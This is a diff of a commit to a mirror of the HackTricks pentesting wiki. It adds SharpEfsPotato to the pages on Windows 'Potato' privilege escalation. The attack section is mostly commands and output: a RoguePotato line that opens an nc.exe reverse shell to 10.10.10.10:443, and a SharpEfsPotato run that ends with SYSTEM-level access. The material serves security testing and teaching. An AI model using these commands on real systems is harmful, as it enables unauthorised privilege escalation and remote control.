Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [#3612] No subject

Browse source
This commit is contained in:
CPol 2022-10-22 12:26:54 +00:00 committed by gitbook-bot
parent f19c8770a6
commit 6c972ba65b
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
3 changed files with 25 additions and 4 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
SUMMARY.md
View file

@ -154,7 +154,7 @@
* [Named Pipe Client Impersonation](windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.md)
* [PowerUp](windows-hardening/windows-local-privilege-escalation/powerup.md)
* [Privilege Escalation with Autoruns](windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md)
* [RoguePotato and PrintSpoofer](windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md)
* [RoguePotato, PrintSpoofer, SharpEfsPotato](windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md)
* [RottenPotato](windows-hardening/windows-local-privilege-escalation/rottenpotato.md)
* [Seatbelt](windows-hardening/windows-local-privilege-escalation/seatbelt.md)
* [SeDebug + SeImpersonate copy token](windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md)

2
windows-hardening/windows-local-privilege-escalation/juicypotato.md
View file

@ -13,7 +13,7 @@
</details>
{% hint style="warning" %}
**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer) and [**RoguePotato**](https://github.com/antonioCoco/RoguePotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_
**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_
{% endhint %}
{% content-ref url="roguepotato-and-printspoofer.md" %}

25
windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
View file

@ -1,4 +1,4 @@
# RoguePotato and PrintSpoofer
# RoguePotato, PrintSpoofer, SharpEfsPotato
<details>
@ -13,7 +13,7 @@
</details>
{% hint style="warning" %}
**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer) and [**RoguePotato**](https://github.com/antonioCoco/RoguePotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
{% endhint %}
## Quick Demo
@ -41,6 +41,27 @@ NULL
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
```
### SharpEfsPotato
```
SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
C:\temp>type C:\temp\w.log
nt authority\system
```
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>